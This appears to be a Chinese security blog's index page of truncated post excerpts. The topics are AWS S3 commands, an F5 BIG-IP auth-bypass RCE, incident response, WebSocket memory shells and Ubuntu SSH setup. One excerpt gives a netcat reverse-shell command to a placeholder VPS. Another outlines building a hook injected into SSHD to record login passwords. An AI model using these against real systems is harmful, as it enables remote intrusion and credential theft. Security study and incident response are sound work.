aws s3常用命令

aws s3常用命令查看目录下所有文件夹(|head查看前10个)aws s3 ls s3://mleang/qk/data/aws s3 ls s3://dfiee/06/|head查看文件夹大小aws s3 ls s3://acne-l/202221/ --s --h# 输出结果Total O


CVE-2022-1388:F5 BIG-IP身份验证绕过RCE

CVE-2022-1388:F5 BIG-IP身份验证绕过RCE简介F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。漏洞概述漏洞编号:CVE-2022-1388该漏洞是由于iControl REST的身份验证功能存在缺陷,攻击者可利用该漏洞在


注入SSHD进程并记录ssh登录的密码

注入SSHD进程并记录ssh登录的密码what’s this?注入SSHD之后就能记录下密码或者做其他操作。how to use执行gcc -shared inject_got.c -ldl -fPIC -o test2.somv test2.so /tmp/hello.sogcc sshdHook


应急响应实战笔记

GitHub 地址:https://github.com/Bypass007/Emergency-Response-NotesGitBook 地址:https://bypass007.github.io/Emergency-Response-Notes/项目介绍面对各种各样的安全事件,我们该怎么处


linux反弹shell以及哑shell变为交互式shell

linux反弹shell以及哑shell变为交互式shell反弹shell用 nc 反弹,命令如下:nc <your_vps> 1024 -e /bin/sh某些目标的 nc 不支持 -e 参数,有两个解决思路,要么使用其他版本的 nc:nc.traditional <your_v


websocket新型内存马的应急响应

websocket新型内存马的应急响应前几天看到一个推送,websocket新型内存马。因其自身注册在Ws下面所以常规的内存检测脚本memshell scanner无法快速检出来。项目地址:https://github.com/veo/wsMemShell为了防止应急响应的时候翻车,我复现了一下ws


一种全新的内存马

WebSocket 内存马,一种新型内存马技术1.前言WebSocket是一种全双工通信协议,即客户端可以向服务端发送请求,服务端也可以主动向客户端推送数据。这样的特点,使得它在一些实时性要求比较高的场景效果斐然(比如微信朋友圈实时通知、在线协同编辑等)。主流浏览器以及一些常见服务端通信框架(Tom


Ubuntu安装ssh并开机启动

ubuntu安装ssh并开机启动1、安装openssh-serversudo apt-get install openssh-server2、开机自动启动ssh命令sudo systemctl enable ssh3、关闭ssh开机自动启动命令sudo systemctl disable ssh4、